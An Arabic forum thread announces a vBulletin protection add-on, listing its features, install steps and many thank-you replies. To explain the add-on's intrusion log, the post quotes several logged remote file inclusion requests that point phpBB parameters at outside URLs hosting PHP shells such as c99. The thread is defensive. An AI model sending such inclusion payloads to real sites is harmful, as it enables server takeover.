إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

تقليص
هذا الموضوع مغلق.
X
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

    [frame="6 80"]بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اسم المنتج : حماية المنتدي i.s.s.w
    الإصدار : i.s.s.w v 4.1
    المبرمجين : الفريق الامني M.M.A i.s.s.w
    جديد الاصدار :
    1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
    2: امكانية التحكم في الصفحة التي تعرض للمخترق
    3: اضافه لوحت تحكم مختصره cp vb
    4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
    5 : تنبية في التحديث
    6: تعديلات في عمل الهاك وتحديثة
    7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
    8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
    9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

    نطلب الدعاء لنا في التوفيق وثبات الايمان
    اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني





    عمل الهاك : حماية المنتدى بشكل كامل بعون الله






    الخيار الاول : لتشغيل حمايه المنتدي

    منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

    منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

    حجب عدة مواقع تساعد على العبث في المنتديات

    تطوير للدوال القديمة للتوافق معه السيرفر

    منع اكثر اوامر اليونكس وحيل الحقن في الشيل

    اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك

    الخيار الثاني :
    منع اكواد التحويل لاخر عشر مواضيع
    والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

    الان نأتي للقسم الاكثر اثارة للموضوع

    عند دخولك مجلد sec

    افتح الملف logfile_hacker.txt

    ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

    كود PHP:
    2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
    2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

    2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
    2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
    الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

    طبعا الفاصلة تفصل بين كل معلومه ومعلومة

    كود PHP:

    التاريخ والوقت
    كود PHP:
    2007-12-1105:50:44
    عدد المحاولات
    كود PHP:
    1197370244 
    ايبي الموقع المصااب
    كود PHP:
    209.67.223.188 
    الاصابة طبعا تشفرت لاغراض امنيه
    كود PHP:
    p=11575//codebb/lang_select 
    الاستغلال
    كود PHP:
    ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
    نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
    يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
    كود PHP:
    libwww-perl/5.808 
    الان شرح التركيب

    امسح جميع هاكات لها علاقه في الحمايه او منع xss

    اما من ركب هاك الحمايه issw v4.0 issw v3

    عليه فقط حذف ملف البرودكت

    وتركيب المحدث

    شرح حذف الهاك

    من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

    ومن ثم حذف توابعه

    ---------------------------------------------------------------------------
    التركيب
    لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
    upload
    ارفع المجلد sec
    الى مجلد المنتدي الرئيسي
    اعطي التصريح 666 counter.txt logfile_hacker.txt

    وارفع cpnav_issw
    داخل
    vb\includes\xml
    قوم باستدعاء البروديكت من لوحت تحكم المنتدي

    واتمنى لكم النجاح في التنصيب
    ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

    مع
    تحيات الفريق الامني

    الان من لوحت تحكم المنتدي قم برفع البرودكت

    تم تجربت المنتج على الاصدار

    3.6.0 الى 3.7.0

    الحمد لله على كل شيء

    لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
    وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

    اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
    وشكرا لكم

    لتحميل الهاك

    [hide]
    :dw2:
    [/hide]

    رابط الموضوع الاصلي
    http://www.is-sw.net/vb/showthread.php?t=4329

    بالتوفيق
    [/frame]

  • #2
    رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

    شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

    تعليق


    • #3
      رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

      (`'•.¸(` '•. ¸ * ¸.•'´)¸.•'´)
      «´¨`.¸.* شكرا لك اخي*. ¸.´¨`»
      «´¨`.¸.* بارك الله فيك *. ¸.´¨`»
      (¸. •'´(¸.•'´ * `'•.¸)`'•.¸ )

      تعليق


      • #4
        رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

        المشاركة الأصلية بواسطة المصمم مشاهدة المشاركة
        شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
        المشاركة الأصلية بواسطة الملاك الحزين مشاهدة المشاركة
        (`'•.¸(` '•. ¸ * ¸.•'´)¸.•'´)
        «´¨`.¸.* شكرا لك اخي*. ¸.´¨`»
        «´¨`.¸.* بارك الله فيك *. ¸.´¨`»
        (¸. •'´(¸.•'´ * `'•.¸)`'•.¸ )
        حياكم الله إخواني

        موفقين بإذن الله ... لكم مني أجمل تحية .

        تعليق


        • #5
          رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

          جزاك الله خيراً أستاذنا العزيز

          تعليق


          • #6
            رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

            جزاك الله خيرا اخى الحبيب ابو همام

            تعليق


            • #7
              رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

              شكرا على الهاك اخي الكريم

              تعليق


              • #8
                رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                تعليق


                • #9
                  رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                  جزاك الله خير و إلى الأمام دائما

                  تعليق


                  • #10
                    رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                    شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                    تعليق


                    • #11
                      رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                      شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                      تعليق


                      • #12
                        رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                        شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                        تعليق


                        • #13
                          رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                          بالتوفيق
                          شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                          تعليق


                          • #14
                            رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                            تعليق


                            • #15
                              رد: حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1

                              شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

                              تعليق

                              مواضيع تهمك

                              تقليص

                              المنتدى: المكتبة الالكترونية نشرت بواسطة: HaMooooDi الوقت: 07-30-2025 الساعة 04:01 PM
                              المنتدى: التصنيع والانتاج نشرت بواسطة: HaMooooDi الوقت: 07-30-2025 الساعة 03:44 PM
                              المنتدى: التعريف بالهندسة الصناعية نشرت بواسطة: HaMooooDi الوقت: 07-30-2025 الساعة 03:38 PM
                              المنتدى: الجوال والإتصالات نشرت بواسطة: ماريا عبد الله الوقت: 07-10-2025 الساعة 01:22 AM
                              المنتدى: الجوال والإتصالات نشرت بواسطة: ماريا عبد الله الوقت: 07-04-2025 الساعة 12:04 AM
                              يعمل...
                              X